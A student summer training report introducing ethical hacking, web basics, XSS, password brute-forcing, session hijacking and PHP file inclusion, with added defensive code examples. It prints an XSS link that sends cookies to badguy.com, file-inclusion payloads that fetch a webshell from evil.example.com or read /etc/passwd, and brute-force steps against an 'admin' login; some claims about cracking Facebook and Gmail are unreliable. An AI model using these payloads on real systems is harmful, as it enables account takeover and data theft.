Page 1: Report

SUMMER TRAINING REPORT

SUBMITTED BY:
DEVPRIYO RAY
CSE-A, 3RD YEAR (VTH SEMESTER)
REG. NO-1031330059

Page 2: Report

INTRODUCTION

ANONYMOUS

As for the literal operation of Anonymous, becoming part of it is as simple as going onto its Internet Relay Chat forums and typing away.

The real-life people involved in Anonymous could be behind their laptops anywhere, from an Internet café in Malaysia to a Michigan suburb.

Anonymous appears to have no spokesperson or leader.

One could participate for a minute or a day in a chat room, and then never go back again.

Anonymous is the future form of Internet-based social activism. They laud the "hacktivists" for their actions.

Page 3: Report

WHY DO PEOPLE HACK?

• To make security stronger (ethical hacking)
• Just for fun
• To show off
• To hack other systems secretly
• To notify many people of their thoughts
• To steal important information
• To destroy an enemy's computer network during a war

WHAT IS ETHICAL HACKING?

Also called Attack & Penetration Testing, White-hat Hacking, or Red Teaming:

• It is legal
• Permission is obtained from the target
• Part of an overall security program

Page 4: Report

• Identify vulnerabilities visible from the Internet

Ethical hackers possess the same skills, mindset and tools as a hacker, but the attacks are done in a non-destructive manner.

Hacking

The process of breaking into systems for:

• Personal or commercial gains
• Malicious intent: causing severe damage to information & assets
• Conforming to accepted professional standards of conduct

TYPES OF HACKERS

White Hat Hackers:

A White Hat is a hacker who specializes in penetration testing and in other testing methodologies to ensure the security of an organization's information systems.

Page 5: Report

Black Hat Hackers:

A Black Hat is the villain or bad guy, especially in a western movie in which such a character would stereotypically wear a black hat in contrast to the hero's white hat.

Grey Hat Hackers:

A Grey Hat, in the hacking community, refers to a skilled hacker whose activities fall somewhere between white and black hat hackers on a variety of spectra.

Why Can't We Defend Against Hackers?

• There are many unknown unsecure holes in the system
• Hackers need to know only one loophole in the system
• Administrators need to know all the loopholes to defend the system

Page 6: Report

Why Do We Need Ethical Hacking?

TYPES OF ATTACKS

Various kinds of possible attacks on a computer system are:

• Denial of service attack
• Brute force attack
• Cross site scripting (XSS)
• File inclusions (or file upload), and many more.

Page 7: Report

WEB BASICS AND SECURITY

WEB APPLICATIONS:

• Big trend: software as a (Web-based) service
  – Online banking, shopping, government, bill payment, tax prep, customer relationship management, etc.
  – Cloud computing
• Applications hosted on Web servers
  – Written in a mixture of PHP, Java, Perl, Python, C, ASP
• Security is rarely the main concern
  – Poorly written scripts with inadequate input validation
  – Sensitive data stored in world-readable files
  – Recent push from Visa and MasterCard to improve security of data management (PCI standard)

Page 8: Report

TYPICAL WEB APPLICATION DESIGN:

A web application is designed keeping in mind the following things:

• Runs on a Web server or application server
• Takes input from Web users (via Web server)
• Interacts with back-end databases and third parties
• Prepares and outputs results for users (via Web server)
• Dynamically generated HTML pages
• Contain content from many different sources, often including regular users
  – Blogs, social networks, photo-sharing websites…

BROWSER AND NETWORK:

A browser basically interacts with the network. It sends a request to the network according to the need of the user (using the GET method). The reply concerning the request sent is displayed on the browser (using the POST method).

Page 9: Report

BASIC EXECUTION MODEL OF A BROWSER:

Each browser window or frame:

• Loads content
• Renders
  – Processes HTML and scripts to display the page
  – May involve images, subframes, etc.
• Responds to events

Events

• User actions: OnClick, OnMouseover
• Rendering: OnLoad
• Timing: setTimeout(), clearTimeout()

HTML AND SCRIPTS:

EXAMPLE

<html>
<body>
<p>The script on this page adds two numbers</p>
<script>
var num1, num2, sum;
num1 = prompt("Enter first number");
num2 = prompt("Enter second number");
sum = parseInt(num1, 10) + parseInt(num2, 10);
alert("Sum = " + sum);
</script>
</body>
</html>

Page 10: Report

EVENT DRIVEN SCRIPT EXECUTION:

EXAMPLE

<script type="text/javascript">
function whichButton(event) {
  // MouseEvent.button is 0 for the left button, 1 for the middle and 2 for the right
  // (the original slide compared against 1, the old Internet Explorer value for the left button)
  if (event.button === 0) {
    alert("You clicked the left mouse button!");
  } else {
    alert("You clicked the right mouse button!");
  }
}
</script>
<body onmousedown="whichButton(event)">
</body>

Page 11: Report

OUTPUT:

Page 12: Report

JAVASCRIPT:

Language executed by the browser
• Scripts are embedded in Web pages
• Can run before the HTML is loaded, before the page is viewed, while it is being viewed or when leaving the page

Used to implement "active" web pages
• AJAX, huge number of Web-based applications

Attacker gets to execute code on the user's machine
• Often used to exploit other vulnerabilities

"The world's most misunderstood programming language"

Page 13: Report

JAVASCRIPT IN WEBPAGES:

Embedded in an HTML page as a <script> element

• JavaScript written directly inside the <script> element
  – <script> alert("Hello World!") </script>

• Linked file as the src attribute of the <script> element
  <script type="text/javascript" src="functions.js"></script>

Event handler attribute
  <a href="http://www.yahoo.com" onmouseover="alert('hi');">Yahoo</a>

Pseudo-URL referenced by a link
  <a href="javascript:alert('You clicked');">Click me</a>

Page 14: Report

JAVASCRIPT SECURITY MODEL:

Script runs in a "sandbox"
• No direct file access, restricted network access

Same-origin policy
• Can only read properties of documents and windows from the same server, protocol, and port
• If the same server hosts unrelated sites, scripts from one site can access document properties on the other

User can grant privileges to signed scripts
• UniversalBrowserRead/Write, UniversalFileRead, UniversalSendMail
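The three components the same-origin policy compares can be checked mechanically. The following is an added example in JavaScript, not code from the report; originOf and sameOrigin are this example's own names and the URLs are constructed. It also covers the shared-host case from the second bullet above.

```javascript
// Added example: decide whether two URLs share an origin under the
// same-origin policy above (same protocol, same host, same port).
// Default ports are normalised so http://a.example and
// http://a.example:80 compare equal. The URLs below are constructed.
const DEFAULT_PORTS = { 'http:': '80', 'https:': '443' };

// Reduce a URL to its origin triple: "protocol//host:port".
function originOf(urlString) {
  const u = new URL(urlString);
  const port = u.port || DEFAULT_PORTS[u.protocol] || '';
  return `${u.protocol}//${u.hostname.toLowerCase()}:${port}`;
}

// A script loaded from `a` may read document/window properties of `b`
// only when this returns true.
function sameOrigin(a, b) {
  return originOf(a) === originOf(b);
}

// One case per component the policy compares, plus the shared-host case
// the slide warns about: unrelated sites under one host share an origin.
const CASES = [
  ['http://example.com/app', 'http://example.com:80/other', true],      // default port
  ['http://example.com/', 'https://example.com/', false],              // protocol differs
  ['https://example.com/', 'https://example.com:8443/', false],        // port differs
  ['https://example.com/', 'https://api.example.com/', false],         // host differs
  ['https://host.example/~alice/', 'https://host.example/~bob/', true], // same host, two sites
];

for (const [a, b, expected] of CASES) {
  const got = sameOrigin(a, b);
  console.log(got === expected ? 'ok  ' : 'FAIL', a, b, '->', got);
}
```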

Page 15: Report

REMOTE SCRIPTING:

Goal: exchange data between a client-side app in a browser and a server-side app (without reloading the page)

Methods

• Java applet or ActiveX control or Flash
  – Can make HTTP requests and interact with client-side JavaScript code, but requires LiveConnect (not available on all browsers)
• XML-RPC
  – Open, standards-based technology that requires XML-RPC libraries on your server and in client-side code
• Simple HTTP via a hidden IFRAME
  – IFRAME with a script on your web server (or database of static HTML files) is by far the easiest remote scripting option

Page 16: Report

REMOTE SCRIPTING EXAMPLE:

client.html: pass arguments to server.html

<script type="text/javascript">
function handleResponse() {
  alert('this function is called from server.html');
}
</script>
<iframe id="RSIFrame" name="RSIFrame" style="width:0px; height:0px; border: 0px" src="blank.html"></iframe>
<a href="server.html" target="RSIFrame">make RPC call</a>

server.html: could be a PHP app, anything

<script type="text/javascript">
// Runs inside the hidden iframe and calls back into the parent page
window.parent.handleResponse();
</script>

Page 17: Report

CROSS SITE SCRIPTING (XSS)

WHAT IS XSS?

An XSS vulnerability is present when an attacker can inject scripting code into pages generated by a web application.

Methods for injecting malicious code:

Reflected XSS ("type 1")
  the attack script is reflected back to the user as part of a page from the victim site

Stored XSS ("type 2")
  the attacker stores the malicious code in a resource managed by the web application, such as a database

Others, such as DOM-based attacks

Page 18: Report

XSS EXAMPLE:

Search field on victim.com:

http://victim.com/search.php?term=apple

Server-side implementation of search.php:

<HTML> <TITLE> Search Results </TITLE>
<BODY>
Results for <?php echo $_GET['term']; /* echoes the search term into the response without escaping: this is the XSS bug */ ?>
. . .
</BODY> </HTML>

Page 19: Report

Now consider the link

http://victim.com/search.php?term=<script>window.open("http://badguy.com?cookie=" + document.cookie)</script>

What if the user clicks on this link?

1. Browser goes to victim.com/search.php
2. victim.com returns <HTML> Results for <script> … </script>
3. Browser executes the script: sends badguy.com the cookie for victim.com

OUTPUT:
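What the fix looks like for the search page above, as an added example in JavaScript rather than the report's PHP: the vulnerable rendering beside one that HTML-encodes the term before it reaches the response. escapeHtml, renderVulnerable, renderSafe and containsScriptElement are this example's own names; the probe term is constructed to match the slide's link.

```javascript
// Added example: the search.php page above, re-done in JavaScript once
// as written (term echoed raw) and once with output encoding.
// Names here are this example's own; the probe term is constructed.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Encode the five HTML metacharacters so user text stays text.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}

// Mirrors `Results for <?php echo $_GET['term'] ?>`: whatever the client
// put in ?term= is inserted into the markup unchanged.
function renderVulnerable(term) {
  return `<HTML><TITLE>Search Results</TITLE><BODY>Results for ${term}</BODY></HTML>`;
}

// Same page with the term encoded at the point of output: a "<script>"
// in the term is displayed literally and never parsed as an element.
function renderSafe(term) {
  return `<HTML><TITLE>Search Results</TITLE><BODY>Results for ${escapeHtml(term)}</BODY></HTML>`;
}

// Crude review check: does the rendered page contain a script element?
// The server template above has none, so any hit came from the term.
function containsScriptElement(html) {
  return /<script\b/i.test(html);
}

// Constructed probe shaped like the slide's link.
const PROBE = '<script>window.open("http://badguy.com?cookie=" + document.cookie)</script>';
console.log('raw echo carries a script element    :', containsScriptElement(renderVulnerable(PROBE)));
console.log('encoded echo carries a script element:', containsScriptElement(renderSafe(PROBE)));
```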

Page 20: Report

REFLECTED XSS:

STORED XSS:

Page 21: Report

CRACKING

Cracking is the procedure of obtaining the passwords of certain documents, files, etc. using illegal means. However, in the case of penetration testing, cracking is not illegal; it is done with the consent of the required authorities.

Various methods are used to crack passwords, like brute force attack, dictionary attack, social engineering, etc.

EXAMPLE OF BRUTE FORCE ATTACK USING FIREFORCE:

Fireforce is an add-on used in Mozilla Firefox for cracking passwords. After installing this add-on, the following procedure is followed:

Launching the attack:

Page 22: Report

We want the password for the user 'admin'.

1) Fill the username section with 'admin'
2) Right click in the Password field and select: Fireforce > Generate Password > specify the type of password.
3) Enter the minimum length
4) Enter the maximum length
5) Enter the text that identifies the failed authentication
6) Enter the number of requests per second

Page 23: Report

Click on save and the passwords will be generated.

Using a little imagination, all the Facebook passwords can be cracked, but it largely depends upon the computing power of the CPU.

However, this method cannot be applied to crack Gmail passwords. Gmail passwords, however, can be simply cracked using a dictionary attack, which in turn requires a lot of computing power and is way beyond the scope of a normal PC.
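From the defender's side, the pattern this procedure produces is easy to spot in authentication logs. The following is an added example in JavaScript, not part of the report: it flags accounts whose failed logins exceed a threshold inside a sliding window. The log format, field names, thresholds and log lines are constructed for the example.

```javascript
// Added example: the defender's view of the brute-force procedure above.
// Scan login-attempt log lines and flag any username whose failures exceed
// LIMIT inside a sliding WINDOW_MS window: a tool sending several guesses
// per second at one account produces exactly this pattern. The log format
// ("<ISO time> <client ip> <user> <OK|FAIL>") and the lines are constructed.
const LIMIT = 5;           // failures tolerated per window
const WINDOW_MS = 10_000;  // 10-second sliding window

const LOG_LINES = [
  '2024-05-01T10:00:00.000Z 203.0.113.7 admin FAIL',
  '2024-05-01T10:00:00.000Z 198.51.100.2 bob FAIL',
  '2024-05-01T10:00:00.500Z 203.0.113.7 admin FAIL',
  '2024-05-01T10:00:01.000Z 203.0.113.7 admin FAIL',
  '2024-05-01T10:00:01.500Z 203.0.113.7 admin FAIL',
  '2024-05-01T10:00:02.000Z 203.0.113.7 admin FAIL',
  '2024-05-01T10:00:02.500Z 203.0.113.7 admin FAIL',  // 6th failure in 2.5 s
  '2024-05-01T10:00:05.000Z 192.0.2.9 alice FAIL',
  '2024-05-01T10:00:15.000Z 198.51.100.2 bob FAIL',
  '2024-05-01T10:00:30.000Z 198.51.100.2 bob FAIL',
  '2024-05-01T10:00:40.000Z 192.0.2.9 alice FAIL',
  '2024-05-01T10:00:45.000Z 198.51.100.2 bob FAIL',
  '2024-05-01T10:01:00.000Z 198.51.100.2 bob FAIL',
  '2024-05-01T10:01:15.000Z 198.51.100.2 bob FAIL',   // 6 failures, but 15 s apart
  '2024-05-01T10:01:20.000Z 192.0.2.9 alice OK',
];

function parseLine(line) {
  const [ts, ip, user, outcome] = line.split(' ');
  return { t: Date.parse(ts), ip, user, outcome };
}

// Lines are assumed to be in time order. Returns the flagged usernames.
function findBruteForce(lines, limit = LIMIT, windowMs = WINDOW_MS) {
  const recent = new Map();   // user -> failure timestamps still inside the window
  const flagged = new Set();
  for (const ev of lines.map(parseLine)) {
    if (ev.outcome !== 'FAIL') continue;
    const q = recent.get(ev.user) ?? [];
    while (q.length && ev.t - q[0] > windowMs) q.shift();  // drop expired failures
    q.push(ev.t);
    recent.set(ev.user, q);
    if (q.length > limit) flagged.add(ev.user);
  }
  return [...flagged];
}

console.log('accounts under brute force:', findBruteForce(LOG_LINES));
```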

Page 24: Report

SESSION HIJACKING

Session hijacking, sometimes also known as cookie hijacking, is the exploitation of a valid computer session (sometimes also called a session key) to gain unauthorized access to information or services in a computer system. In particular, it is used to refer to the theft of a magic cookie used to authenticate a user to a remote server. It has particular relevance to web developers, as the HTTP cookies used to maintain a session on many web sites can be easily stolen by an attacker using an intermediary computer or with access to the saved cookies on the victim's computer.

A popular method is using source-routed IP packets. This allows an attacker at point B on the network to participate in a conversation between A and C by encouraging the IP packets to pass through B's machine.

If source-routing is turned off, the attacker can use "blind" hijacking, whereby it guesses the responses of the two machines. Thus, the attacker can send a command, but can never see the response. However, a common command would be to set a password allowing access from somewhere else on the net.

Page 25: Report

METHODS OF SESSION HIJACKING:

Session fixation, where the attacker sets a user's session id to one known to him, for example by sending the user an email with a link that contains a particular session id. The attacker now only has to wait until the user logs in.

Session sidejacking, where the attacker uses packet sniffing to read network traffic between two parties to steal the session cookie. Many web sites use SSL encryption for login pages to prevent attackers from seeing the password, but do not use encryption for the rest of the site once authenticated. This allows attackers that can read the network traffic to intercept all the data that is submitted to the server or web pages viewed by the client. Since this data includes the session cookie, it allows the attacker to impersonate the victim, even if the password itself is not compromised. Unsecured Wi-Fi hotspots are particularly vulnerable, as anyone sharing the network will generally be able to read most of the web traffic between other nodes and the access point.

Page 26: Report

Cross-site scripting, where the attacker tricks the user's computer into running code which is treated as trustworthy because it appears to belong to the server, allowing the attacker to obtain a copy of the cookie or perform other operations.

Malware and unwanted programs can use browser hijacking to steal a browser's cookie files without a user's knowledge, and then perform actions (like installing Android apps) without the user's knowledge. An attacker with physical access can simply attempt to steal the session key by, for example, obtaining the file or memory contents of the appropriate part of either the user's computer or the server.
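A check a reviewer can run against a site's response headers, added here as an example in JavaScript and not taken from the report: it flags session cookies that lack the Secure attribute (so they travel over the unencrypted pages that sidejacking relies on) or the HttpOnly attribute (so document.cookie, as in the cross-site scripting case, can read them). parseSetCookie and auditSetCookie are this example's own names and the header samples are constructed.

```javascript
// Added example: audit Set-Cookie header values for the two attributes whose
// absence enables the attacks above. Without Secure the cookie is also sent
// on plain-HTTP pages (sidejacking); without HttpOnly it is readable from
// script via document.cookie (the XSS case). Samples are constructed.

// Split "name=value; Attr; Attr=val" into the cookie name and a lowercase
// set of attribute names.
function parseSetCookie(header) {
  const [pair, ...attrs] = header.split(';').map((p) => p.trim());
  const eq = pair.indexOf('=');
  const name = eq < 0 ? pair : pair.slice(0, eq);
  const flags = new Set(attrs.map((a) => a.split('=')[0].trim().toLowerCase()));
  return { name, flags };
}

// Return the cookie name and a list of findings (empty when both are set).
function auditSetCookie(header) {
  const { name, flags } = parseSetCookie(header);
  const findings = [];
  if (!flags.has('secure')) {
    findings.push('missing Secure: cookie will also be sent over plain HTTP, where it can be sniffed');
  }
  if (!flags.has('httponly')) {
    findings.push('missing HttpOnly: cookie is readable from script via document.cookie');
  }
  return { name, findings };
}

// Constructed headers: a session cookie with neither, one, and both attributes.
const SAMPLES = [
  'PHPSESSID=abc123; Path=/',
  'PHPSESSID=abc123; Path=/; Secure',
  'PHPSESSID=abc123; Path=/; Secure; HttpOnly',
];

for (const header of SAMPLES) {
  const { name, findings } = auditSetCookie(header);
  console.log(name, findings.length === 0 ? 'ok' : findings);
}
```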

Page 27: Report

FILE INCLUSION

File inclusion vulnerability is a type of vulnerability most often found on websites. It allows an attacker to include a file, usually through a script on the web server. The vulnerability occurs due to the use of user-supplied input without proper validation. This can lead to something as minimal as outputting the contents of the file or more serious events such as:

• Code execution on the web server
• Code execution on the client side, such as JavaScript, which can lead to other attacks such as cross site scripting (XSS)
• Denial of service (DoS)
• Data theft/manipulation

TYPES OF INCLUSION:

1) REMOTE FILE INCLUSION
2) LOCAL FILE INCLUSION

Page 28: Report

EXAMPLE: Consider this PHP script, which includes a file specified by the request:

<?php
if ( isset( $_GET['COLOR'] ) ) {
    // Vulnerable: the request parameter is used directly to build the include path
    include( $_GET['COLOR'] . '.php' );
}
?>
<form method="get">
  <select name="COLOR">
    <option value="red">red</option>
    <option value="blue">blue</option>
  </select>
  <input type="submit">
</form>

The developer intended only blue.php and red.php to be used as options. But it is possible to inject code from other files, as anyone can insert arbitrary values for the COLOR parameter.

/vulnerable.php?COLOR=http://evil.example.com/webshell.txt? - injects a remotely hosted file containing malicious code.

/vulnerable.php?COLOR=C:\\ftp\\upload\\exploit - executes code from an already uploaded file called exploit.php (local file inclusion vulnerability).

/vulnerable.php?COLOR=C:\\notes.txt%00 - example using the NULL meta character to remove the .php suffix, allowing access to files other than .php. (Enabling magic_quotes_gpc limits the attack by escaping special characters, thus disabling the use of the NUL terminator.)

Page 29: Report

/vulnerable.php?COLOR=/etc/passwd%00 - allows an attacker to read the contents of the passwd file on a UNIX system via directory traversal.
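The same script with the parameter confined to an allowlist, as an added example in JavaScript rather than the report's PHP. includePathVulnerable, includePathSafe and classifyIncludeParam are this example's own names, and the probe values are the page's payloads with %00 already URL-decoded to a NUL byte, as the web server would deliver them.

```javascript
// Added example: the COLOR include above, re-done in JavaScript. The
// vulnerable form builds the include path from the raw parameter; the safe
// form maps the parameter onto a fixed allowlist and refuses anything else.
// classifyIncludeParam explains a refusal for logging. Names are this
// example's own; the probes are the page's payloads, URL-decoded (%00 -> NUL).
const ALLOWED_INCLUDES = new Map([['red', 'red.php'], ['blue', 'blue.php']]);

// Mirrors include($_GET['COLOR'] . '.php'): the client controls the path.
function includePathVulnerable(color) {
  return color + '.php';
}

// Exact-match allowlist: the file to include, or null to refuse.
function includePathSafe(color) {
  return ALLOWED_INCLUDES.get(color) ?? null;
}

// Why a refused value is dangerous, for the audit log.
function classifyIncludeParam(value) {
  const reasons = [];
  if (/^[a-z][a-z0-9+.-]*:\/\//i.test(value)) reasons.push('remote URL (remote file inclusion)');
  if (value.includes('\u0000')) reasons.push('NUL byte (truncates the .php suffix)');
  if (/[\\\/]/.test(value) || /^[a-z]:/i.test(value)) reasons.push('path separator or drive letter (local file inclusion)');
  if (value.includes('..')) reasons.push('parent directory reference (traversal)');
  return reasons;
}

// Constructed probes: the intended value plus the four payloads from the page.
const PROBES = [
  'red',
  'http://evil.example.com/webshell.txt?',
  'C:\\ftp\\upload\\exploit',
  'C:\\notes.txt\u0000',
  '/etc/passwd\u0000',
];

for (const p of PROBES) {
  const safe = includePathSafe(p);
  console.log(JSON.stringify(p));
  console.log('  raw include would load :', JSON.stringify(includePathVulnerable(p)));
  console.log('  allowlist decision     :', safe ?? 'refused: ' + classifyIncludeParam(p).join('; '));
}
```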